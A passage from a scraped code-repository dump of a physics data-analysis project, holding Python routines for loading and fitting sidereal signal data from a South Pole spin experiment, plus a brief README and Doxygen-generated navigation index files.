diag(calcedUnc**2*varSclFact), chi2, [0,pi/2], [0,pi/2], None) \r\n else:\r\n ts=ys=errs=array([])\r\n combAmp=None #SiderealFitData(*(7*[None]))\r\n if plot:\r\n if isinstance(plot, Axes):\r\n axL=[plot, plot]\r\n elif hasattr(plot, \"__getitem__\"):\r\n axL=plot #assume it's a list with two axes\r\n else:\r\n figure()\r\n axL=[gca(), gca()]\r\n\r\n for t, y, e, ax in zip(ts.T, ys.T, errs.T, axL):\r\n ax.errorbar( t, y, e, fmt='.') \r\n axL[0].set_title('x')\r\n axL[1].set_title('y')\r\n\r\n #gdInd=~(isnan(ys) | isinf(ys) | isinf(errs))\r\n #ys=ys[gdInd]\r\n #errs=errs[gdInd]\r\n #if sum(~isnan(errs)) <1:\r\n #return None\r\n #sm.WLS(\r\n \r\n return combAmp\r\n #return mn, calcedUnc, apparentUnc, wEr, chi2\r\n\r\ndef spSearchSet(timestamp, rSpec, sigWindow, bgWindow, startTime=-inf, endTime=inf, bPlotAll=True ): \r\n '''\r\n Todos:\r\n - Filter out sequence points by chi squared, error bar, or even deviation from the mean\r\n - Low pass filter first, then look at slope or remaining RMS for weighting value\r\n - Histogram the string points and try to find any common signature to the outliers\r\n - Do a multiple regression for the correlation data vs the signal data\r\n - Output extra details like 'cosmic' angle, and mean signal in the lab-frame.\r\n '''\r\n ####################LOAD DATA##########################\r\n if hasattr(timestamp, 'fastD'): #If we've actually been handed a dataset, not a timestamp\r\n D=timestamp\r\n else: #Load one\r\n D=SPDataSet(timestamp, startTime=startTime, endTime=endTime)\r\n\r\n ###################CUT AND PROCESS INTO POINTS###################\r\n rawAmp0=RawData(t=D.fastD[0], sig=D.fastD[1])\r\n trigTimes=makeTriggers(D.fastD[0], rSpec, bIncludeExtraRot=True);\r\n cutAmp=preprocess_raw(rawAmp0, trigTimes, sigWindow)\r\n pointAmp=process_raw(cutAmp)\r\n if bPlotAll:\r\n view_raw(rawAmp0, cutAmp, trigTimes)\r\n\r\n #################### FILTER OUT BAD POINTS#######################\r\n if 0:\r\n filterSensorNameL= ['Tilt Sensor 1'],\r\n rawSig, badM= filterBySensors(cutAmp,\r\n sensDataL=getSensors(D, filterSensorNameL),\r\n bView= bPlotAll)\r\n \r\n ##################PROCESS BY SEQUENCE (CORRELATION)####################\r\n seqAmp=process_points(D.apparatusAngles, pointAmp, cutAmp )\r\n #view_correlations(seqAmp)\r\n\r\n ################PROCESS ALL SEQUENCES, I.E. WHOLE SET####################\r\n ## Divide the sequences into groups (e.g. EW and NS) and process them, returning also the lab-fram numbers\r\n labAmps, sidAmps, seqAmps= split_and_process_sequences(seqAmp)\r\n\r\n view_sidereal(seqAmps[0], sidAmps[0] )\r\n view_sidereal(seqAmps[1], sidAmps[1] )\r\n view_sidereal(seqAmps[2], sidAmps[2] )\r\n\r\n\r\n return labAmps, sidAmps#, sidAmpAlt\r\n\r\nif __name__==\"__main__\":\r\n from pylab import *\r\n from scipy import random\r\n\r\n\r\n if 0:\r\n # Check string analysis:\r\n N=10000\r\n t=linspace(0,10,N)\r\n dat=(arange(N)%2 -0.5)*1\r\n dat+=random.normal(0, size=N)\r\n\r\n plot(t,dat)\r\n vprint(stringAnalysis(t, dat, ones(N)*0.5))\r\n \r\n if 0: #Check MakeTestData\r\n bTest=True\r\n dat=MakeTestData(RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=90), amp=1, sigma=0.01, zeroingTime=500)\r\n\r\n if 0:\r\n D=loadSet('5348.82', startTime=5348.86)\r\n nameL=['Tilt Sensor 1']\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n [ts1]=getSensors(D, nameL)\r\n #out=sliceReduceData( ts1[0], ts1[1], \r\n #trigTimes + secs2sd(sigWindow.offset), secs2sd(sigWindow.duration) )\r\n window=Window(offset=-5.0, duration=4)\r\n trigTimes=makeTriggers(ts1[0], rSpec, bIncludeExtraRot=True);\r\n ts1Ts, [_, ts1CutSig, ts1CutErr], ts1CutIndxL = sliceReduceData( ts1[0], ts1[1], trigTimes + secs2sd(window.offset), secs2sd(window.duration) ) \r\n #M=nanmean(ts1CutSig.ravel())\r\n badM, ts1SM=MT.findOutliers(ts1CutSig.ravel(), windowLen=50, sigmas=3, bReturnMeanLine=True)\r\n figure()\r\n #as\r\n plot(ts1Ts.ravel(), ts1CutSig.ravel(),'.')\r\n plot(ts1Ts.ravel()[badM], ts1CutSig.ravel()[badM],'.')\r\n plot(ts1Ts.ravel(), ts1SM, lw=2)\r\n if 0: #Check analysis\r\n timestamps=[\r\n '5227.40',\r\n #'5310.41',\r\n #'5318.41',\r\n #'5348.86',\r\n ]\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n res=spSearchSet(\r\n MakeTestData(rSpec, amp=10.05, sigma=2, N=800000, phi=-0.15*pi, zeroingTime=30, fracDev=0.00, sizeDev=50.0),\r\n rSpec,\r\n Window(offset=-3, duration=2), Window(offset=-1,duration=1),\r\n bPlotAll=True,\r\n )\r\n if 0:\r\n from SPDataSet import SPDataSet\r\n rSpec=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\r\n sd,sig=makeTestData(\r\n rSpec, amp=10.05, sigma=2, N=800000, phi=-0.15*pi, zeroingTime=30, fracDev=0.00, sizeDev=50.0)\r\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec )\r\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.625, "avg_line_length": 23, "blob_id": "99c870f8e2fc12716fadaa931f6bae7d76a88554", "content_id": "e9b118572573767a4e563f9f2021bdf5d338270f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 96, "license_type": "no_license", "max_line_length": 74, "num_lines": 4, "path": "/html/search/files_3.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['loadspfiles_2epy',['loadSPFiles.py',['../loadSPFiles_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "2dad3751b53ca52b9e95d36e52e49c28ed13565f", "content_id": "35fbc695a001cb123f4a7e594531d46fe59d4729", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 36, "num_lines": 3, "path": "/README.md", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "# spcpt-analysis\nanalysis stuff for spcpt\nAnd practising git-hubby workflow...\n" }, { "alpha_fraction": 0.6629213690757751, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 43.75, "blob_id": "86f26382f00189265dbdddea75517188ae4de816", "content_id": "974639895fed73867892e72c2433fff233f86cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 178, "license_type": "no_license", "max_line_length": 123, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages =\n[\n [ \"pr\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr\" ]\n];" }, { "alpha_fraction": 0.5541343092918396, "alphanum_fraction": 0.572864294052124, "avg_line_length": 36.3731689453125, "blob_id": "fbc493224826fd944a72930cf3fe7abe0090e96e", "content_id": "1117340474039f1936d1ed358dcd2accf4ee5703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15323, "license_type": "no_license", "max_line_length": 210, "num_lines": 410, "path": "/loadSPFiles.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"Functions for loading data files from the SP experiment\n\n\"\"\"\nimport numpy as np\nfrom os import path\nimport os\nimport re\nfrom collections import namedtuple\nimport yaml\nimport MT\nimport convert\n\nrelaxedNames=\"\"\"Tot Pos Det\nTot Pos Det 2\nTot Pos Det 3\nCell Temp\nFerrite Temp\nOven Temp\nTemperature Controller Output\nBreadboard Temp\nRoom Temp\nG10 Lid Temp\nTilt Sensor 1\nTilt Sensor 2\nWavelengthErr\nPump Current Mon\nPump Temp Mon\nProbe Current Mon\nProbe Temp Mon\nWater Flow\nApparatus Position\n\"\"\".splitlines()\nmediumNames=\"\"\"Accelerometer\nPosition Purple\nPosition Green\nFluxgate X\nFluxgate Y\nFluxgate Z\nTiltmeter X\nTiltmeter Y\nVert Pos Det\nHoriz Pos Det\nVert Pos Det 2\nHoriz Pos Det 2\nVert Pos Det 3\nHoriz Pos Det 3\n\"\"\".splitlines()\n\ndef getSpinningDataNames(timestamp, bMotorData=False):\n if not bMotorData:\n base_name='SP_aparatus {0}'.format(timestamp)\n else:\n base_name='SP_motor {0}'.format(timestamp)\n base_dir=os.path.join(os.getenv('SP_DATA_DIR'), base_name + ' Bundle/')\n return base_dir, base_name\n\ndef getAllTimeStamps(bApparatus=True, bMotor=False):\n data_dir=os.path.join(os.getenv('SP_DATA_DIR'))\n ap_dir_regex=re.compile('SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n mo_dir_regex=re.compile('SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n\n regExL=[]\n if bApparatus:\n regExL.append(ap_dir_regex)\n if bMotor:\n regExL.append(mo_dir_regex)\n outL=[]\n for reg in regExL:\n match_list=[ap_dir_regex.match(line) for line in os.listdir(data_dir)]\n stamps=[m.groups()[0] for m in match_list if m is not None]\n stamps.sort()\n outL.append(stamps)\n if len(outL)==1:\n outL=outL[0]\n return outL\n\n#old\ndef loadSet(timestamp, cal=None, subL=[\"Fast\", \"Medium\", \"Relaxed\"], startTime=-np.inf, endTime=np.inf):\n \"\"\"OLD Load all the data associated with @timestamp\n \"\"\"\n if cal is None:\n print(\"Haven't implemented loading of calibration data yet, Your data will stay in Volts\")\n cal=1\n base_dir, base_name=getSpinningDataNames(timestamp)\n\n def splitRecArray(rA):\n t=rA['sd']\n names=list(rA.dtype.names)\n names.remove('sd')\n y=rA[names].view(rA.dtype[-1]).reshape(rA.size,-1)\n return [t, y.T, names]\n\n #startI=0\n fastD=None;\n medD=None; \n relD=None;\n if \"Fast\" in subL:\n fastRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Fast'), totalDataType=[('sd','>f8'), ('s1', '>f4')]) \n if fastRec is not None:\n fastD=splitRecArray(fastRec)\n fastD[1]=fastD[1].squeeze()\n fastD[1]*=cal\n\n startI, endI=fastD[0].searchsorted([startTime, endTime])\n fastD[0]=fastD[0][startI:endI]\n fastD[1]=fastD[1][startI:endI]\n\n if \"Medium\" in subL:\n medRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Medium'), useMetaFile=True) \n if medRec is not None:\n renameFieldMaybe(medRec, 'Sidereal Days', 'sd')\n medD=splitRecArray(medRec)\n startI, endI=medD[0].searchsorted([startTime, endTime])\n medD[0]=medD[0][startI:endI]\n medD[1]=medD[1][:,startI:endI]\n\n\n\n if \"Relaxed\" in subL:\n relRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Relaxed'), useMetaFile=True) \n if relRec is not None:\n renameFieldMaybe(relRec, 'Sidereal Days', 'sd')\n relD=splitRecArray(relRec)\n startI, endI=relD[0].searchsorted([startTime, endTime])\n relD[0]=relD[0][startI:endI]\n relD[1]=relD[1][:,startI:endI]\n if \"Slow\" in subL:\n slRec=loadSPBinary.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'Slow'), useMetaFile=True) \n if slRec is not None:\n renameFieldMaybe(slRec, 'Sidereal Days', 'sd')\n slD=splitRecArray(slRec)\n\n return SPDataSet(fastD, medD=medD, relD=relD)\n\nset_info_defaults={\n 'bUseful': 'unknown',\n 'bDataConfirmed':False,\n 'acquisition':{'sampleRate': 50, 'timeConstant': 0.003},\n #'rotationSpec':{'delay': 9, \n # 'interval':30, \n # 'numRotations':20,\n # 'rotAngles': [-180],\n # 'extraRotAngle': -90.,\n # 'startingAngle': 0,\n # },\n 'timeStamp':'unknown',\n 'notes': 'Default',\n #'windows':{}\n 'windows':{\n 'sig':{\n 'duration': 4,\n 'offset': -6.6,\n },\n 'bg':{\n 'duration': 1,\n 'offset': 0,\n },\n }\n }\ndef loadSetInfo(dir_name):\n ts=dir_name.split()[-2]\n bWriteNew=False\n filepath=os.path.join(dir_name, 'set_info.yaml')\n try:\n f=open(filepath)\n infoD=yaml.load(f)\n f.close()\n except IOError:\n print(\"No set_info.yaml exists in {}, making defaults\".format(dir_name))\n bWriteNew=True\n infoD= {}\n\n loadedKeys=infoD.keys()\n if 'bandwidth' in loadedKeys: #It's a matlab generated yaml file\n print(\"updating matlab generated yaml\")\n #newD=copy(set_info_defaults)\n newD={\n 'bUseful':infoD['bUseful'],\n 'bDataConfirmed':infoD['bDataConfirmed'],\n 'acquisition':{'sampleRate': infoD['bandwidth'][1], \n 'timeConst': infoD['bandwidth'][0]\n },\n 'rotationSpec':{'delay': infoD['delay'], 'interval':infoD['interval'],\n 'numRotations':infoD['numRotations'], \n 'rotAngles': [infoD['rotationAngles'][0]], \n 'extraRotAngle':infoD['rotationAngles'][1],\n 'startingAngle':MT.cardinalToDeg(infoD['startPosition']),\n },\n 'timeStamp':infoD['timestamp'],\n 'notes':infoD['notes']+'\\nConverted from matlab',\n }\n infoD=newD\n writeSetInfo(dir_name, infoD)\n \n if infoD.has_key('rotationSpec') and infoD['rotationSpec'].has_key('startPosition'):\n infoD['rotationSpec']['startingAngle']= MT.cardinalToDeg(infoD['rotationSpec']['startPosition'])\n infoD['rotationSpec'].pop('startPosition')\n\n newLoadedKeys=infoD.keys()\n for key in set_info_defaults.keys():\n if key not in newLoadedKeys:\n infoD[key]=set_info_defaults[key]\n print(\"Loading {0} from defaults, it may not be right. Go fix this in set_info.yaml!\".format(key))\n\n if bWriteNew:\n infoD['timeStamp']=ts\n writeSetInfo(dir_name, infoD)\n return infoD\n\ndef writeSetInfo(dir_name, D):\n filepath=os.path.join(dir_name, 'set_info.yaml')\n print(\"writing new set_info.yaml file...\")\n fout=open(filepath,'w')\n fout.write(yaml.dump(D))\n fout.close()\n print(\"{0} was written.\".format(filepath))\n\ndef loadZeroFile(fname):\n proc_dict={\n 1: 'cBz',\n 2: 'By',\n 3: 'Bx',\n 35: 'Cal',\n 29: 'Pol',\n }\n dat=np.loadtxt(fname).T;\n t=dat[0]\n proc_num=dat[1]\n val=dat[2]\n slope=dat[3]\n sigma=dat[4]\n ZeroProc=namedtuple('ZeroProc', ['t', 'val', 'slope', 'sigma'])\n zD={}\n for num, name in proc_dict.iteritems():\n I=np.where(proc_num==float(num))[0]\n zD[name]=ZeroProc(t=t[I], val=val[I], slope=slope[I], sigma=sigma[I])\n #DataFrame =namedtuple('DataFrame', ['sd', 'y'])\n return zD\n\n\ndef getAllSPSensor(names, slc=None, timeRange=None):\n data_dir=os.path.join(os.getenv('SP_DATA_DIR'))\n ap_dir_regex=re.compile('SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n mo_dir_regex=re.compile('SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle$')\n\n ap_match_list=[ap_dir_regex.match(line) for line in os.listdir(data_dir)]\n ap_stamps=[m.groups()[0] for m in ap_match_list if m is not None]\n mo_match_list=[mo_dir_regex.match(line) for line in os.listdir(data_dir)]\n mo_stamps=[m.groups()[0] for m in mo_match_list if m is not None]\n\n mo_stamps.sort()\n ap_stamps.sort()\n ioff()\n sdL=[]\n if slc is None:\n [firstI, lastI]=searchsorted(ap_stamps, timeRange)\n slc=slice(firstI, lastI)\n #slc=slice(-20,-15)\n relIdxs=[relaxedNames.index(name) for name in names if name in relaxedNames]\n medIdxs=[mediumNames.index(name) for name in names if name in mediumNames]\n #slIdxs=[slowNames.index(name) for name in names if name is in slowNames]\n #medList=[idx for name in names if name is in mediumNames]\n #slList=[idx for name in names if name is in slNames]\n\n allMedL=[]\n allRelL=[]\n subSetL=[]\n if medIdxs:\n subSetL.append(\"Medium\")\n if relIdxs:\n subSetL.append(\"Relaxed\")\n \n for stamp in ap_stamps[slc]:\n thisTsYL=[]\n dat=loadSet(stamp, subL=subSetL)\n relL=[]\n medL=[]\n #tsL=[]\n for idxs, D, l in [(relIdxs, dat.relD, relL), (medIdxs, dat.medD, medL)]:\n if idxs and D:\n l.append([D[0]]+[D[1][idx] for idx in idxs])\n #tsL.append(D[0])\n #else:\n #tsL.append(None)\n #l.append(None)\n \n if medL:\n allMedL.append(medL)\n if relL:\n allRelL.append(relL)\n\n if 0:\n try:\n dat=loadSet(stamp, subL=subSet)\n if subSet=='Relaxed':\n D=dat.relD\n elif subSet=='Medium':\n D=dat.medD\n elif subSet=='Slow':\n D=dat.slowD\n if D:\n sd=D[0].copy()\n y=D[1][D[2].index(name)].copy()\n del dat\n sdL.append(sd)\n yL.append(y)\n \n except ValueError:\n print(\"\\nTimestamp {0} didn't load, maybe no '{1}' data? \\n \\n\".format(stamp, subSet))\n if allRelL:\n allRelL=dstack(allRelL).squeeze()\n if allMedL:\n allMedL=dstack(allMedL).squeeze()\n return allMedL, allRelL\n\ndef loadBins(root_path, useMetaFile=True, nVars=1, endian='', dType=None, totalDataType=None):\n \"\"\"Load all the binary files in that match the root path.\n\n They match the root path with regex 'root_path( \\d+)?.bin',\n that is anything that starts with root_path, ends with .bin, and optionally has a number after a space. If there are numbers after the space, the files are loaded and the data appended in the correct order.\n \"\"\"\n dirname=path.dirname(root_path) \n rootname=path.basename(root_path) \n r=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n dlist=os.listdir(dirname);\n dlist=[st for st in dlist if r.match(st)]\n if not dlist:\n print(\"No data for {0}\".format(root_path))\n return None\n if len(dlist)>1:\n dlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n \n dat_list=[loadABin(path.join(dirname, fname), useMetaFile=useMetaFile, nVars=nVars, endian=endian, totalDataType=totalDataType) for fname in dlist]\n # Combine these into a single file...\n\n dat=np.hstack(dat_list)\n #datnames=dat_list[0].keys()\n return dat\n\ndef loadABin(filepath, nVars=1, useMetaFile=True, endian='', totalDataType=None):\n \"\"\"Load a single binary file at filepath\n \"\"\"\n #This is all just establishing how the data is stored in the file\n if totalDataType is None: #If a data type wasn't given, we'll try to work it out:\n if useMetaFile: #Usually the data type is stored in a meta file: \n fname_components=path.splitext(filepath)[0].split(' ')\n if fname_components[-1].isdigit():\n fname_components.pop()\n meta_file_path=' '.join(fname_components) + '.npmeta'\n npmeta_path=' '.join(fname_components) + '.npmeta'\n if path.exists(npmeta_path):\n mfile=open(npmeta_path)\n lines=mfile.readlines()\n pairs=[line.strip().split(',') for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n defaultDtype='>f4'\n totalDataType=[]\n for p in pairs:\n name=p[0].strip()\n if len(p)>1:\n dt=p[1].strip()\n defaultDtype=dt;\n else:\n dt=defaultDtype;\n totalDataType.append((name, dt));\n else: #If there was no appropriate unambiguous meta-file, look for the old style:\n meta_file_path=' '.join(fname_components) + '.meta'\n if not path.exists(meta_file_path): #Sometimes they have the extension .meta.txt for no good reason, so check for that too\n meta_file_path=meta_file_path+'.txt'\n if path.exists(meta_file_path):\n convert.spmeta2npmeta(meta_file_path) #This convert the old style to the new (Corrects for some changes, but not all)\n print(\"Found an old meta-file only. Will attempt to make something useful out of it (old style is ambiguous)\")\n return loadABin(filepath, nVars, useMetaFile) #We'll run the function again with the new meta file exists\n #mfile=open(meta_file_path)\n else:\n raise IOError(\"Looking for a meta-file (for {0}) but none exists\".format(' '.join(fname_components)))\n sigNames=mfile.readlines()\n sigNames=[name.strip() for name in sigNames]\n if sigNames[0]=='Sidereal Days':\n sigNames=sigNames[1:]\n nVars=len(sigNames)\n sigDataType=[(name, endian+'f8') for name in sigNames]\n timeDataType=[('sd', endian+'f8')]\n totalDataType=timeDataType+sigDataType\n\n else:\n timeDataType=[('sd', endian+'f8')]\n sigDataType=[('s{0}'.format(n), endian+'f8') for n in range(1,nVars+1)]\n totalDataType=timeDataType+sigDataType\n\n # This is where we actually read it\n dat=np.fromfile(filepath, totalDataType)\n\n return dat;\n\nif __name__==\"__main__\":\n #ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n #fpath=ddir+'SP_motor 5253.67 sensors 8.bin'\n ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5256.38 Bundle/'\n #ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5256.38 Bundle/'\n fname='SP_aparatus 5256.38 Medium 6.bin'\n fname_f='SP_aparatus 5256.38 Fast'\n ddir2='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n fname2='SP_motor 5253.67 sensors'\n fpath=ddir+fname\n fpath_f=ddir+fname_f\n\n dat=loadABin(fpath, useMetaFile=True);\n dat_f=loadBins(fpath_f, useMetaFile=False, totalDataType=[('sd','>f8'), ('s1', '>f4')]);\n dat2=loadBins(ddir+'SP_aparatus 5256.38 Medium')\n dat3=loadBins(ddir2+fname2, useMetaFile=True)\n" }, { "alpha_fraction": 0.5151515007019043, "alphanum_fraction": 0.747474730014801, "avg_line_length": 38.79999923706055, "blob_id": "95325e259805eeddf59c6316700861c7fb46c593", "content_id": "dc817205228aaf7ba7dcc520eca7130b15295faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 198, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/html/convert_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var convert_8py =\n[\n [ \"allDirsSpmeta2Npmeta\", \"convert_8py.html#a98b540877656803471dddb9a87fce779\", null ],\n [ \"spmeta2npmeta\", \"convert_8py.html#af9f80b1ee66d98e05cf941352cdda54d\", null ]\n];" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 24.5, "blob_id": "e5361f639e92a0e7458b8923323d5c459d1c4a41", "content_id": "709e18404a0e2ce1e2fbf582ad4d7dffc5c8065c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 102, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/html/search/files_6.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['test_5fspfuncs_2epy',['test_SPfuncs.py',['../test__SPfuncs_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.4693813621997833, "alphanum_fraction": 0.7863221168518066, "avg_line_length": 74.71146392822266, "blob_id": "b3344841d292396b5492f4fc88159d8d21cb10d4", "content_id": "d2d3edd2f25f706bb57d4b722c6d5c7c3340a37d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 19155, "license_type": "no_license", "max_line_length": 134, "num_lines": 253, "path": "/html/navtreeindex0.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var NAVTREEINDEX0 =\n{\n\"SPDataSet_8py.html\":[2,0,8],\n\"SPDataSet_8py.html#a296fa19993c2ac2fa6db975b8b0f6b88\":[2,0,8,3],\n\"SPDataSet_8py.html#a2e421078d46e1d8f3b0c2d7c8211e1a2\":[2,0,8,23],\n\"SPDataSet_8py.html#a3c7145cc42e7ec16a596f5996a8e70e2\":[2,0,8,16],\n\"SPDataSet_8py.html#a5a94fa78adaa1ce53cae1e69c7a10c1f\":[2,0,8,4],\n\"SPDataSet_8py.html#a6b49ba99ee674be07d78e57e0d6a4506\":[2,0,8,17],\n\"SPDataSet_8py.html#a794711a619d88291abbe1c9c29396b5b\":[2,0,8,18],\n\"SPDataSet_8py.html#a7ef84c87edaf55c60c75aa4a6b63fabf\":[2,0,8,19],\n\"SPDataSet_8py.html#a9d0e07e3e1f4360be4f8c59927abe142\":[2,0,8,2],\n\"SPDataSet_8py.html#a9dcba74d2fb20a6a41c191302ec5136b\":[2,0,8,15],\n\"SPDataSet_8py.html#aa23a4db7857d6d485ae098e21e29cf59\":[2,0,8,6],\n\"SPDataSet_8py.html#aa809f797a727977783e89201eb7515ba\":[2,0,8,21],\n\"SPDataSet_8py.html#aaa1cf30f24f4635798c2ac9ab8cb991f\":[2,0,8,20],\n\"SPDataSet_8py.html#aae98530dd28697279534ad7dd042acd8\":[2,0,8,5],\n\"SPDataSet_8py.html#ab3e94a5db004f2a1cbe3b89005731d7c\":[2,0,8,12],\n\"SPDataSet_8py.html#ab977d64bf78ed1ce32101398d66e2673\":[2,0,8,22],\n\"SPDataSet_8py.html#abc13a280637f719ae917c9f2cf2d9d47\":[2,0,8,10],\n\"SPDataSet_8py.html#ac07feedd7af03661a0925bdec0d1f1fe\":[2,0,8,11],\n\"SPDataSet_8py.html#acf5db24745ff3b8a02816869e9b10482\":[2,0,8,7],\n\"SPDataSet_8py.html#ae343b1ec862928d74ae9f6e140008b0d\":[2,0,8,13],\n\"SPDataSet_8py.html#ae71666498d0f08a9d2c39f65c8be15e1\":[2,0,8,14],\n\"SPDataSet_8py.html#ae9bed330120419db29ade2d021ca34d7\":[2,0,8,9],\n\"SPDataSet_8py.html#aee5e268a39b4f3d7d26b8cd8c2eb0dce\":[2,0,8,8],\n\"SPDataSet_8py.html#af4556d66bac96baab9aed887e66ce083\":[2,0,8,24],\n\"SPDataSet_8py.html#af6b0d8ee29678751051a0b15362f9949\":[2,0,8,1],\n\"SPDataSet_8py_source.html\":[2,0,8],\n\"SPfuncs_8py.html\":[2,0,9],\n\"SPfuncs_8py.html#a0fa8a32d68b3b6a1486926b952bd3676\":[2,0,9,43],\n\"SPfuncs_8py.html#a154be474c56db17750f8232efe410d54\":[2,0,9,9],\n\"SPfuncs_8py.html#a165fa263d040e95cba983de350ee563f\":[2,0,9,47],\n\"SPfuncs_8py.html#a1aca1da7012fa44af8ba6fb057c7ed1b\":[2,0,9,23],\n\"SPfuncs_8py.html#a1ffb0a48d6d36a1260a65e82c4604ce2\":[2,0,9,39],\n\"SPfuncs_8py.html#a2533afa952ea007cfad4a1deb6a607a5\":[2,0,9,3],\n\"SPfuncs_8py.html#a26157a1627869c31bfa6e494e5caf311\":[2,0,9,25],\n\"SPfuncs_8py.html#a29a04cecefb141502380f4e43bc1d06d\":[2,0,9,40],\n\"SPfuncs_8py.html#a40e964ab0b81bcee6065cfa0b5bde422\":[2,0,9,30],\n\"SPfuncs_8py.html#a45a8e352a69cc8a225a32134c87cd120\":[2,0,9,28],\n\"SPfuncs_8py.html#a47dc9e4b5eebaf862bdd545eaff5c371\":[2,0,9,31],\n\"SPfuncs_8py.html#a4dc94cbb119a397cfee47da5a4681676\":[2,0,9,49],\n\"SPfuncs_8py.html#a5a727d85f97fb1e1e7370fbca3b1d1ea\":[2,0,9,6],\n\"SPfuncs_8py.html#a5d91f2e7930fdc007f010659068307f9\":[2,0,9,13],\n\"SPfuncs_8py.html#a5e62fc21df71cfdd96a1c0048b264295\":[2,0,9,35],\n\"SPfuncs_8py.html#a5f881c246a0ac49955b33746df6c379b\":[2,0,9,48],\n\"SPfuncs_8py.html#a68243cfba6d3074cf6381b76546eec71\":[2,0,9,34],\n\"SPfuncs_8py.html#a7265a1148ca13e5fb7961b297a214d13\":[2,0,9,12],\n\"SPfuncs_8py.html#a7590e0785adc48ccbabea8d0eccda514\":[2,0,9,4],\n\"SPfuncs_8py.html#a792112113be3784fc089059c6eed4ff1\":[2,0,9,17],\n\"SPfuncs_8py.html#a7fb1286952274a8a185975238894be9d\":[2,0,9,24],\n\"SPfuncs_8py.html#a7fe775d9cf2e94f97127d699a8b92579\":[2,0,9,38],\n\"SPfuncs_8py.html#a87aac33304db20fd58d7a3625061cca6\":[2,0,9,21],\n\"SPfuncs_8py.html#a8dd105859db0f7ebef805efb3c08dfb7\":[2,0,9,44],\n\"SPfuncs_8py.html#a97ee543cf8ac7b27443cbfe8ff2e20f3\":[2,0,9,32],\n\"SPfuncs_8py.html#a98d08fa254a21b0b0895f424f7006dbd\":[2,0,9,14],\n\"SPfuncs_8py.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d\":[2,0,9,36],\n\"SPfuncs_8py.html#a9ae89d50fa931a7cc863400505be38b1\":[2,0,9,11],\n\"SPfuncs_8py.html#a9c4d4bc9bf9302d2690f560af0d9982b\":[2,0,9,29],\n\"SPfuncs_8py.html#a9cc828a26b8f8d72c9c5c86bd951f8e8\":[2,0,9,0],\n\"SPfuncs_8py.html#a9d03b1e8bb9325cdab8fa026d6cdbbe3\":[2,0,9,19],\n\"SPfuncs_8py.html#aa45dbb6291e4944f3ba2718a3d0ee001\":[2,0,9,10],\n\"SPfuncs_8py.html#aa986fff9d1f1b5354e43e972289e5844\":[2,0,9,15],\n\"SPfuncs_8py.html#aaea13a6ab57b30bea3669d56fd489e30\":[2,0,9,37],\n\"SPfuncs_8py.html#ab1cf4f0f232b2ccd32f08baa27263f1b\":[2,0,9,46],\n\"SPfuncs_8py.html#ab8ea55b3a0adfc5e8090a9a40db96e5a\":[2,0,9,41],\n\"SPfuncs_8py.html#aba724f914a5cc838851518564a1f5d84